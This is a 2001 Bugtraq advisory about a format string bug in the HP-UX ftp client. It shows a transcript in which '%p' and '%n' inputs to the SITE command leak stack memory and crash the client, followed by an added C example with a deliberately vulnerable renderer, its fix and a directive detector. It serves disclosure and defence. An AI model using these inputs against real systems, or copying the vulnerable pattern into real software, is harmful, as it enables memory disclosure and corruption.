Bugtraq mailing list archives

HP/UX FTP format string vulnerability


From: "[ zorgon ]" <zorgon () ANTIONLINE ORG>
Date: Mon, 8 Jan 2001 13:55:53 -0800

A format string vulnerability exists in ftp. This vulnerability was
discussed with HP labs.

$ uname -a
HP-UX hpotac8 B.11.00 A 9000/785 2004901631 licence pour deux utilisateurs
$ ftp localhost
Connected to localhost.
220 localhost FTP server (Version 1.1.214.6 Wed Feb  9 08:03:34 GMT 2000) ready.
Name (localhost:zorgon):zorgon
331 Password required for zorgon.
Password:
230 User zorgon logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> site exec %p %p %p %p
200-40008f10 00000003 00000002 00000001
200  (end of '40008f10 00000003 00000002 00000001')
ftp> site exec %n %n %n %n
Bus error(coredump)
$

And the 'SITE' command is also vulnerable
...
ftp> site %p %p %p %p
500 'SITE 40008F0C 00000002 00000002 00000001': command not understood.
ftp> site %n %n %n %n
Bus error(coredump)
$ file core
core:           fichier de vidage de la memoire de'ftp' - recu SIGBUS

The character format strings are not being parsed correctly in the ftp client.
When HP labs fix the problem in the client, the result will be:

ftp>  site exec %n %n %n %n
--->  SITE exec %n %n %n %n
200-%n %n %n %n
200  (end of '%n %n %n %n')
ftp>

So in this case the ftpd server will not process the character format strings.
The fix will be made in the next release of the ftp client.

-------------------------------------
zorgon <zorgon () antionline org>
http://www.nightbird.free.fr
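An added illustration of the bug class described in the post, written here in C and not taken from the post or from HP's ftp source: a hypothetical reply renderer in the vulnerable form (user text becomes the format string, so `%p` leaks stack words and `%n` writes memory) beside the fixed form (constant format, user text passed as a `%s` argument, so `%n` is carried verbatim as in the post-fix transcript), plus a small filter that flags input containing printf conversion directives for logging or rejection. All function names are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical stand-in for the client's reply printer.  The defect on this
 * page is a user-typed command reaching a printf-family call as the FORMAT
 * argument rather than as data. */

/* Vulnerable form (illustration only, never call it with untrusted text):
 * the command text is spliced into the format, so "%p" prints stack words
 * and "%n" writes to whatever address is on the stack (the SIGBUS in the
 * post).  A function pointer is used so the compiler's format checks do not
 * hide the defect; this is what a -Wformat-security warning points at. */
int render_reply_vulnerable(char *out, size_t outsz, const char *cmd)
{
    int (*unchecked_snprintf)(char *, size_t, const char *, ...) = snprintf;
    char fmt[256];
    snprintf(fmt, sizeof fmt, "200-%s", cmd);     /* fmt is now "200-%n %n ..." */
    return unchecked_snprintf(out, outsz, fmt);   /* cmd's directives get interpreted */
}

/* Fixed form: the format string is a compile-time constant and the user
 * text is an ordinary %s argument, so "%n %n %n %n" is copied literally,
 * which is the behaviour the post shows after HP's client fix. */
int render_reply_safe(char *out, size_t outsz, const char *cmd)
{
    return snprintf(out, outsz, "200-%s", cmd);
}

/* Defensive check for an input filter or log audit: does the text contain a
 * printf conversion directive?  "%%" is a literal percent and is ignored;
 * any other character after '%' (including a space, which is a valid flag)
 * is treated conservatively as the start of a directive. */
int contains_format_directive(const char *s)
{
    for (const char *p = s; (p = strchr(p, '%')) != NULL; p++) {
        if (p[1] == '%') { p++; continue; }      /* escaped percent, skip both */
        if (p[1] != '\0') return 1;
    }
    return 0;
}

int main(void)
{
    char line[256];                               /* constructed sample input */
    render_reply_safe(line, sizeof line, "exec %n %n %n %n");
    printf("%s\n", line);                         /* 200-exec %n %n %n %n */
    printf("flagged: %d\n", contains_format_directive("exec %p %p %p %p"));
    return 0;
}
```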
